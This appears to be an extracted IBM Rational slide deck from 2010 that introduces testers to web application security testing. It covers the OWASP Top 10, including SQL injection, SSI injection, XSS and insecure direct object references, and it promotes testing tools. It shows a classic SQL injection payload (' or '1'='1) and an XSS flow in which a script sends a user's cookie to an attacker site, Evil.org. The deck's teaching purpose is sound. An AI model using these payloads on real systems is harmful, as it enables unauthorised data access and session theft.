get ready for web application security testing

®

IBM Software Group

© 2010 IBM Corporation

Get Ready for Web Application Security Testing

Alan KanTechnical ManagerIBM Rational [email protected]

IBM Software Group | Rational software

Run Down

The Security Landscape

What does it mean for Testing Professionals

A Few Top Attacks and How to Test for Them

What You Can Do to Prepare for Security Testing


The Web Ecosystem (Simplified)


LexisNexis

Data Breach

-Washington Post

Feb 17, 2008

IndiaTimes.com Malware

—InformationWeek

Feb 17,2008

Hacker breaks into

Ecuador’s

presidential website

— Thaindian, Feb 11, 2008

Hacking Stage 6 — Wikipedia, Feb 9 2007

Hacker steals Davidson

Cos client data

- Falls Tribune, Feb 4 2008

RIAA wiped off the Net— TheRegister, Jan 20 2008

Chinese hacker

steals 18M identities

- HackBase.com, Feb 10,2008

Mac blogs defaced by

XSS

• The Register, Feb 17, 2008

Your Free MacWorld Expo Platinum Pass— CNet, Jan 14, 2008

Hacker takes down Pennsylvania gvmt — AP, Jan 6, 2008

Drive-by Pharming

in the Wild

— Symantec, Jan 21 2008Italian Bank hit by XSS fraudsters

— Netcraft, Jan 8 2008

Greek Ministry

websites hit by

hacker intru

sion

— eKathimerini, Jan 31,2008


“JB Hi-Fi's websites in Australia and New Zealand were redirecting customers to malicious web pages over the weekend in a cyber attack ”stuff.co.nz 01/12/2009

“Turkish defacers broke into the New Zealand based registrar Domainz.net …Companies which had their New Zealand web sites defaced include Microsoft, HSBC, Coca-Cola, F-secure, Bitdefender, Sony and Xerox ”

zone-h.org/news/id/4708 21/04/2009

“Security Intelligence Service director Warren Tucker revealed government department websites had been attacked and information stolen”nzherald.co.nz 12/09/2007

“A florist which does all of its business online has had its website targeted by hackers and customers' credit card details have been stolen”abc.net.au 16/9/2007

“Computer hackers have cracked the defences of dozens of top government and business sector internet sites this year, raising concerns about the safety of consumers' financial and personal information” SMH.com.au 14/10/ 2007

What about in this part of the world?


Web Application Security is Neglected

of all attacks on Information Securityare directed to the Web Application Layer

75%75%of all Web Applications are vulnerable2/32/3

Network Server

WebApplication

s

% of Attacks % of Dollars

75%

10%

25%

90%

Security Spending


Run Down






Secure Applications – Who is Responsible?

System Administrator?

Network Administrator?

Security Professional?

Solution Architect?

Developers?

Testing Professional?


The Trend – Incorporate Security into Testing

Build

Developers

SDLC

Developers

Developers

Coding QA Security Production

Incorporate Security as part of Testing

Ensure vulnerabilities are addressed before applications are put into production


Security Testing Steps are not that different from usual

Identify possible vulnerability

Prove vulnerability

Assess risk, scope, depth, severity and impact

Create repeatable tests

Test migitation, and fixes


Run Down






OWASP and the OWASP Top 10 list

Open Web Application Security Project – an open organization dedicated to fight insecure software

“The OWASP Top Ten document represents a broad consensus about what the most critical web application security flaws are”


1 - Injection Flaws

What is it? User-supplied data is sent to an interpreter as part of a command, query or data.

What are the implications? SQL Injection – Access/modify data in DB

SSI Injection – Execute commands on server and access sensitive data

LDAP Injection – Bypass authentication

…


SQL Injection

User input inserted into SQL Command: Get product details by id:

Select * from products where id=‘$REQUEST[“id”]’;

Hack: send param id with value ‘ or ‘1’=‘1

Resulting executed SQL:Select * from products where id=‘’ or ‘1’=‘1’

All products returned


SQL Injection Example I


SQL Injection Example II


SQL Injection Example - Exploit


SQL Injection Example - Outcome


Injection Flaws (SSI Injection Example) Creating commands from input


The return is the private SSL key of the server


2. Cross-Site Scripting (XSS)

What is it? Malicious script echoed back into HTML returned from a trusted site, and runs under

trusted context

What are the implications? Session Tokens stolen (browser security circumvented)

Complete page content compromised

Future pages in browser compromised


Cross Site Scripting – The Exploit Process

Evil.org

User bank.com

1) Link to bank.comsent to user viaE-mail or HTTP

2) User sends script embedded as data

3) Script/data returned, executed by browser

4) Script sends user’s cookie and session information without the user’s consent or knowledge

5) Evil.org uses stolen session information to impersonate user


XSS Example I

HTML code:


XSS Example II

HTML code:


4 - Insecure Direct Object Reference

What is it? Part or all of a resource (file, table, etc.) name controlled by user input.

What are the implications? Access to sensitive resources

Information Leakage, aids future hacks


Insecure Direct Object Reference - Example


Insecure Direct Object Reference – Example Cont.


Run Down






Get Educated on the Topic

Beware of legal issues

Create a Sandpit envrionment

Know the latest trends – IBM X-Force Threat Reportshttp://www-935.ibm.com/services/nz/iss/xforce/trendreports/

Study pass and current exploits – US Computer Emergency Readiness Teamhttp://www.kb.cert.org/vuls

Learn how to test for the vulnerabilities - OWASP Testing guidehttp://www.owasp.org/index.php/OWASP_Testing_Guide_v3_Table_of_Contents

Learn the syntax of operating system, databases, programming code

Experiemnet with Tools – Web Scarabhttp://www.owasp.org/index.php/Category:OWASP_WebScarab_Project

Experiment with Tools – IBM Rational AppScanhttp://www-01.ibm.com/software/rational/offerings/websecurity/webappsecurity.html


How Does Automated Tool Work?


Get Tools – which ones?

Automated vs Manual Do it a lot quicker in a shorter timeframe

Regression tests

Recommendations

Security-specific vs general automated testing tool Time it takes to become a security expert

Time it takes to learn coding

Time it takes to create report templates

Fix recommendations

Hard to reach places – Malware, Flash

Still needs a human being to validate results

Commercial vs Free tools It costs

Regular updates

Usability, Quality


Tools

Manual Testing OWASP WebScarab

http://www.owasp.org/index.php/Category:OWASP_Project

Firebug

http://getfirebug.com

Automated Testing IBM Rational AppScan

http://www-01.ibm.com/software/rational/offerings/websecurity/webappsecurity.html


© Copyright IBM Corporation 2010. All rights reserved.

The information contained in these materials is provided for informational purposes only, and is provided AS IS without warranty of any kind, express or implied. IBM shall not be responsible for any damages arising out of the use of, or otherwise related to, these materials. Nothing contained in these materials is intended to, nor shall have the effect of, creating any warranties or representations from IBM or its suppliers or licensors, or altering the terms and conditions of the applicable license agreement governing the use of IBM software. References in these materials to IBM products, programs, or services do not imply that they will be available in all countries in which IBM operates. Product release dates and/or capabilities referenced in these materials may change at any time at IBM’s sole discretion based on market opportunities or other factors, and are not intended to be a commitment to future product or feature availability in any way.

IBM, the IBM logo, the on-demand business logo, Rational, the Rational logo, and other IBM products and services are trademarks of the International Business Machines Corporation, in the United States, other countries or both. Other company, product, or service names may be trademarks or service marks of others.


IBM Rational AppScan

The undisputed market leader Ranked #1 in Market Share by IDC

#1 in numerous industry “bake offs”

Automatically scans web applications for vulnerabilities SQL Injection

Cross-site Scripting

Provides clear recommendations on how to fix them i.e. Character sanitization

The Result?Improved security, lower costs, and the ability to meet PCI standards for application security

get ready for web application security testing

Technology

information security

security landscape

security professional

security testing steps

security spending

testing professionals

sql injection user input

web ecosystem